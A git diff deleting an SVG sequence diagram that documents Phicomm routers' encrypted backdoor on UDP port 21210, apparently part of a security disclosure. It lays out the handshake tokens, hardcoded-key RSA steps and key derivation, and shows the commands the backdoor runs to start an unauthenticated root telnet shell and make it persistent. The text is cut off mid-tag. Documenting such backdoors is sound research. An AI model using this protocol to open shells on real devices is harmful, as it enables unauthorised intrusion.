diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg b/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
deleted file mode 100644
index 2c1b6d4..0000000
--- a/Phicomm/backdoor-lockpick_tra-2022-01/img/Phicomms_Encrypted_Backdoor_on_UDP_Port_21210.svg
+++ /dev/null
@@ -1 +0,0 @@
-<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="1111" height="1991"><desc>title%20Phicomm's%20Encrypted%20Backdoor%20on%20UDP%20Port%2021210%0A%0Aparticipant%20Client%0Aparticipant%20Server%0A%0Aactivate%20Client%20%23brown%0AClient-%3EServer%3ASend%20the%20token%20%22%3Ccolor%3A%23red%3EABCDEF1234%3C%2Fcolor%3E%22%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E41424344454631323334%3C%2Fcolor%3E%5D%0A%0Aactivate%20Server%20%23brown%0A%0AServer-%3EServer%3Acompute%20MD5%20hash%20of%20128-byte%20buffer%5Cnbeginning%20with%20%22%3Ccolor%3A%23red%3EK2_COSTDOWN__VER_3.0%3C%2Fcolor%3E%22%5Cnwith%20the%20rest%20of%20the%20bytes%20left%20null.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AClient%3C--Server%3AReply%20with%20the%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E.%5Cn%5Cn%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E812B50867EFB281491D8F9285D007914%3C%2Fcolor%3E%5D%0A%0Adeactivate%20Server%0A%0AClient-%3EClient%3AProduce%20a%2032-byte-long%20message%20called%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnthat%20the%20Server%20will%20decrypt%20with%20**RSA_public_decrypt()**%2C%5Cnusing%20the%20hardcoded%20public%20key.%5Cn%5CnIt%20seems%20that%20the%20Client%20is%20expected%20to%20encrypt%20%3Ccolor%3A%23blue%3EXOR_MASK%3C%2Fcolor%3E%5Cnwith%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E%20that%20corresponds%20to%20the%20%3Ccolor%3A%23darkblue%3E**PUBLIC%5CnKEY**%3C%2Fcolor%3E%20hardcoded%20on%20the%20device.%5Cn%5CnStore%20the%20result%20as%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E.%0A%0A%0A%0Aactivate%20Client%20%23salmon%0A%0AClient--%3EServer%3ASend%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20to%20Server%0A%0AServer-%3EServer%3ADecrypt%20%3Ccolor%3A%23blue%3EENCRYPTED_XOR_MASK%3C%2Fcolor%3E%20with%20**RSA_public_decrypt()**%5Cnand%20store%20result%20as%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23salmon%0A%0AServer-%3EServer%3AGenerate%20a%20string%20of%2031%20random%2C%20printable%5Cncharacters%20(between%20ASCII%20codes%20%3Ccolor%3A%23darkgreen%3E0x21%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23darkgreen%3E0x7e%3C%2Fcolor%3E)%5Cnand%20store%20the%20result%20as%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23orange%0A%0AServer-%3EServer%3AEncrypt%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20**RSA_public_encrypt()**%5Cnusing%20the%20hardcoded%2C%201024-bit%20public%20RSA%20key%2C%20with%20the%5Cn**RSA_NO_PADDING**%20option%20set%20(%22Textbook%20RSA%22).%5Cn%5CnStore%20the%20128-byte%20result%20as%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%0A%0Aactivate%20Server%20%23pink%0A%0A%0AClient%3C--Server%3ASend%20128-byte%20%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20to%20Client%0A%0A%0Aactivate%20Client%20%23orange%0A%0A%0AServer-%3EServer%3A**XOR**%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%20with%20the%20first%2031%20bytes%5Cnof%20%3Ccolor%3A%23blue%3EDECRYPTED_XOR_MASK%3C%2Fcolor%3E%2C%20and%20store%20the%20result%20in%5Cn%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E.%0A%0A%0A%0AClient--%3EClient%3A**If**%20the%20Client%20possesses%20the%20%3Ccolor%3A%23darkblue%3E**PRIVATE%20KEY**%3C%2Fcolor%3E%2C%20or%2C%5Cnperhaps%2C%20a%20database%20of%20such%20keys%2C%20each%5Cnindexed%20by%20an%20%3Ccolor%3A%23blue%3EDEVICE_IDENTIFYING_HASH%3C%2Fcolor%3E%2C%5Cnthen%20they%20may%20now%20proceed%20to%20decrypt%20the%5Cn%3Ccolor%3A%23blue%3ECHALLENGE_CIPHERTEXT%3C%2Fcolor%3E%20and%20store%20%20the%20result%5Cnas%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E.%0A%0A%0Aactivate%20Client%20%23pink%0A%0A%0A%0A%0A%0A%0A%0AServer-%3EServer%3ACreate%20two%20new%20strings%20by%20calling%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%20and%5Cn**sprintf(**%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%2C%20%22%3Ccolor%3A%23purple%3E**%25s**%3C%2Fcolor%3E%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20%3Ccolor%3A%23blue%3EMASKED_SECRET%3C%2Fcolor%3E**)**%2C%5Cnrespectively.%20%5Cn%5Cn(Note%20the%20format%20string.)%0A%0Aactivate%20Server%20%23yellow%0A%0AServer-%3EServer%3ACompute%20the%20**MD5**%20hashes%20of%20%3Ccolor%3A%23blue%3ERAW_TEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3ERAW_PERM_KEY%3C%2Fcolor%3E%5Cnand%20store%20the%2016-byte%20results%20as%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20and%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%2C%5Cnrespectively.%0A%0AClient--%3EClient%3A%20The%20Client%20is%20now%20expected%20to%20append%20one%20of%20two%5Cnsuffixes%20to%20%3Ccolor%3A%23blue%3ESECRET_PLAINTEXT%3C%2Fcolor%3E%3A%5Cn%5Cn-%20%22%3Ccolor%3A%23red%3E%2BTEMP%3C%2Fcolor%3E%22%2C%20to%20launch%20a%20**telnetd**%20session%20that%20will%5Cn%20%20%20last%20until%20the%20router%20is%20rebooted%2C%20%2F%2For%2F%2F%5Cn-%20%20%22%3Ccolor%3A%23red%3E%2BPERM%3C%2Fcolor%3E%22%2C%20to%20write%20a%20flag%20to%20a%20physical%20volume%2C%5Cn%20%20%20which%20the%20**telnetd_startup**%20daemon%20will%20check%20for%5Cn%20%20%20when%20the%20system%20is%20rebooted%2C%20and%20launch%20**telnetd**%5Cn%20%20%20if%20it%20finds%20it.%5Cn%5CnStore%20the%20result%20in%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23yellow%0A%0AClient--%3EClient%3A%20Compute%20the%20**MD5**%20hash%20of%20%3Ccolor%3A%23blue%3ERAW_KEY%3C%2Fcolor%3E%2C%20and%20store%5Cnthe%20result%20in%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E.%0A%0Aactivate%20Client%20%23red%0A%0AClient--%3EServer%3A%20Send%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20to%20Server%0A%0Aactivate%20Server%20%23red%0A%0AServer--%3EServer%3A%20**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3ETEMP_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Etelnetd%20-l%20%2Fbin%2Flogin.sh%3C%2Fcolor%3E%22)**%2C%5Cnlaunching%20an%20unencrypted%20**telnetd**%20shell%5Cnas%20**root**.%20No%20credentials%20are%20required%20to%5Cnlog%20into%20this%20shell.%5Cn%5Cn**If**%20%3Ccolor%3A%23blue%3EBACKDOOR_KEY%3C%2Fcolor%3E%20matches%20%3Ccolor%3A%23blue%3EPERM_KEY%3C%2Fcolor%3E%20then%5Cncall%20**system(%22%3Ccolor%3A%23red%3Eiwpriv%20ra0%20e2p%2026%3D7010%3C%2Fcolor%3E%22)**%2C%5Cnwriting%20the%20bytes%20%5BHEX%3A%20%3Ccolor%3A%23darkgreen%3E7010%3C%2Fcolor%3E%5D%20to%20**EEPROM**%2C%5Cnat%20offset%20%3Ccolor%3A%23darkgreen%3E0x26%3C%2Fcolor%3E%20(virtual%20address%20%3Ccolor%3A%23darkgreen%3E0x40026%3C%2Fcolor%3E).%20This%5Cncode%20will%20instruct%20the%20**telnetd_startup**%20daemon%5Cnto%20launch%20**telnetd%20-l%20%2Fbin%2Flogin.sh**%20on%20boot.%0A</desc><defs/><g><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g/><g><rect fill="white" stroke="none" x="0" y="0" width="1111" height="1991"/></g><g><text fill="black" stroke="none" font-family="sans-serif" font-size="16.5pt" font-style="normal" font-weight="normal" text-decoration="normal" x="273.8413135509609" y="22.6179738" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Phicomm's Encrypted Backdoor on UDP Port 21210</text></g><g/><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 45.149658982 88.511670804 L 45.149658982 1991.4371998440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="11.598960923076923,5.0262164"/><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 88.511670804 L 552.1357946608085 1991.4371998440001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="11.598960923076923,5.0262164"/></g><g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 7.5393246000000005 47.799317964000004 L 82.759993364 47.799317964000004 L 82.759993364 88.511670804 L 7.5393246000000005 88.511670804 L 7.5393246000000005 47.799317964000004 Z" stroke-miterlimit="10" stroke-width="2.4125838720000004" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="23.899658982" y="73.43302160400002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Client</text></g><path fill="none" stroke="none"/><g><path fill="white" stroke="black" paint-order="fill stroke markers" d=" M 511.7087927220458 47.799317964000004 L 592.5627965995712 47.799317964000004 L 592.5627965995712 88.511670804 L 511.7087927220458 88.511670804 L 511.7087927220458 47.799317964000004 Z" stroke-miterlimit="10" stroke-width="2.4125838720000004" stroke-dasharray=""/></g><g><g/><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="528.0691271040458" y="73.43302160400002" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Server</text></g></g><g><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 37.610334382 96.050995404 L 52.688983582 96.050995404 L 52.688983582 1976.3585506440002 L 37.610334382 1976.3585506440002 L 37.610334382 96.050995404" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="brown" stroke="black" paint-order="fill stroke markers" d=" M 544.5964700608085 168.42851156400002 L 559.6751192608085 168.42851156400002 L 559.6751192608085 1976.3585506440002 L 544.5964700608085 1976.3585506440002 L 544.5964700608085 168.42851156400002" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 290.565570084 L 567.2144438608085 290.565570084 L 567.2144438608085 362.943086244 L 552.1357946608085 362.943086244 L 552.1357946608085 290.565570084" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 45.149658982 545.394741564 L 60.228308182 545.394741564 L 60.228308182 1976.3585506440002 L 45.149658982 1976.3585506440002 L 45.149658982 545.394741564" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="salmon" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 664.516070244 L 567.2144438608085 664.516070244 L 567.2144438608085 1976.3585506440002 L 552.1357946608085 1976.3585506440002 L 552.1357946608085 664.516070244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 756.4958303640001 L 574.7537684608085 756.4958303640001 L 574.7537684608085 1976.3585506440002 L 559.6751192608085 1976.3585506440002 L 559.6751192608085 756.4958303640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 567.2144438608085 878.6328888840001 L 582.2930930608085 878.6328888840001 L 582.2930930608085 1976.3585506440002 L 567.2144438608085 1976.3585506440002 L 567.2144438608085 878.6328888840001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="orange" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 920.853106644 L 67.76763278199999 920.853106644 L 67.76763278199999 1976.3585506440002 L 52.688983582 1976.3585506440002 L 52.688983582 920.853106644" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="pink" stroke="black" paint-order="fill stroke markers" d=" M 60.22830818199999 1150.048574484 L 75.306957382 1150.048574484 L 75.306957382 1976.3585506440002 L 60.22830818199999 1976.3585506440002 L 60.22830818199999 1150.048574484" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 574.7537684608086 1287.264282204 L 589.8324176608086 1287.264282204 L 589.8324176608086 1976.3585506440002 L 574.7537684608086 1976.3585506440002 L 574.7537684608086 1287.264282204" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="yellow" stroke="black" paint-order="fill stroke markers" d=" M 67.767632782 1591.852996044 L 82.84628198200001 1591.852996044 L 82.84628198200001 1976.3585506440002 L 67.767632782 1976.3585506440002 L 67.767632782 1591.852996044" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 75.306957382 1668.7541069640001 L 90.385606582 1668.7541069640001 L 90.385606582 1976.3585506440002 L 75.306957382 1976.3585506440002 L 75.306957382 1668.7541069640001" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><path fill="red" stroke="black" paint-order="fill stroke markers" d=" M 582.2930930608086 1710.974324724 L 597.3717422608086 1710.974324724 L 597.3717422608086 1976.3585506440002 L 582.2930930608086 1976.3585506440002 L 582.2930930608086 1710.974324724" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g><g><rect fill="white" stroke="none" x="177.34759304041856" y="118.668969204" width="230.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="177.34759304041856" y="133.747618404" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="177.34759304041856" y="148.826267604" width="242.59026756197144" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Send the token "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="302.4427262968834" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">ABCDEF1234</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="398.85939042041855" y="132.239753484" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="147.318402684" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="179.60939042041855" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="225.2927247710045" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">41424344454631323334</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="411.9593965239342" y="162.397051884" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 52.688983582 168.42851156400002 L 532.1817155528086 168.42851156400002" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(544.5964700608085,168.42851156400002) translate(-544.5964700608085,-168.42851156400002)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 532.0309290608085 162.14574106400002 L 544.5964700608085 168.42851156400002 L 532.0309290608085 174.71128206400002 Z"/></g></g><g><g><rect fill="white" stroke="none" x="585.0575120808086" y="191.046485364" width="285.17358865648436" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="206.125134564" width="321.0736054411523" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="221.203783764" width="254.42358865648438" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="236.282432964" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="585.0575120808086" y="251.361082164" width="348.04025735765623" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="204.617269644" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">compute MD5 hash of 128-byte buffer</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">beginning with "</text><text fill="red" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="707.5859796878593" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">K2_COSTDOWN__VER_3.0</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="897.1193201419609" y="219.695918844" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">"</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="234.774568044" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the rest of the bytes left null.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="249.853217244" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="587.3193094608085" y="264.931866444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="727.035969006707" y="264.931866444" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 559.6751192608085 270.963326124 L 627.5290406608085 270.963326124 L 627.5290406608085 290.565570084 L 579.6291983688085 290.565570084" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray=""/><g transform="translate(567.2144438608085,290.565570084) translate(-567.2144438608085,-290.565570084)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 579.7799848608086 284.282799584 L 567.2144438608085 290.565570084 L 579.7799848608086 296.848340584 Z"/></g></g><g><g><rect fill="white" stroke="none" x="123.35058511336776" y="313.183543884" width="322.8569330206506" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="123.35058511336776" y="328.26219308400005" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="123.35058511336776" y="343.340842284" width="358.123608016073" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Reply with the </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="235.47905119453964" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">DEVICE_IDENTIFYING_HASH</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="439.27905424629745" y="326.75432816400007" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="341.83297736400004" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="125.61238249336776" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">[HEX: </text><text fill="darkgreen" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="171.2957168439537" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">812B50867EFB281491D8F9285D007914</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="473.49572905098495" y="356.911626564" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">]</text></g><g><path fill="none" stroke="black" paint-order="fill stroke markers" d=" M 552.1357946608085 362.943086244 L 65.10373809000001 362.943086244" stroke-miterlimit="10" stroke-width="1.2565541" stroke-dasharray="6.03145968"/><g transform="translate(52.688983582,362.943086244) translate(-52.688983582,-362.943086244)"><path fill="black" stroke="none" paint-order="stroke fill markers" d=" M 65.254524582 356.660315744 L 52.688983582 362.943086244 L 65.254524582 369.22585674400005 Z"/></g></g><g><g><rect fill="white" stroke="none" x="78.071376402" y="385.561060044" width="378.9402741423242" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="400.63970924399996" width="425.7402490606897" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="415.71835844399993" width="237.42358865648438" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="430.7970076439999" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="445.8756568439999" width="431.0902680388086" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="460.95430604399985" width="415.44025888353514" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="476.0329552439998" width="228.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="491.1116044439998" width="4.52359476" height="19.602243960000003"/></g><g><rect fill="white" stroke="none" x="78.071376402" y="506.19025364399977" width="323.1735834112756" height="19.602243960000003"/></g><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="399.131844324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Produce a 32-byte-long message called </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="374.9165172878594" y="399.131844324" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">that the Server will decrypt with </text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="321.91650202907033" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">RSA_public_decrypt()</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="496.88316157496877" y="414.21049352399996" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">,</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="429.28914272399993" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">using the hardcoded public key.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="444.3677919239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="459.4464411239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">It seems that the Client is expected to encrypt </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="427.06651118434377" y="459.4464411239999" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">XOR_MASK</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">with the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="144.88317683375783" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PRIVATE KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="250.0998440090508" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> that corresponds to the </text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="431.81650355494924" y="474.52509032399985" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">PUBLIC</text><text fill="darkblue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="bold" text-decoration="normal" x="80.333173782" y="489.6037395239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">KEY</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="112.333173782" y="489.6037395239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"> hardcoded on the device.</text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="504.6823887239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve"></text><text fill="black" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="80.333173782" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" xml:space="preserve">Store the result as </text><text fill="blue" stroke="none" font-family="sans-serif" font-size="11pt" font-style="normal" font-weight="normal" text-decoration="normal" x="220.04983332789845" y="519.7610379239998" text-anchor="start" dominant-baseline="alphabetic" 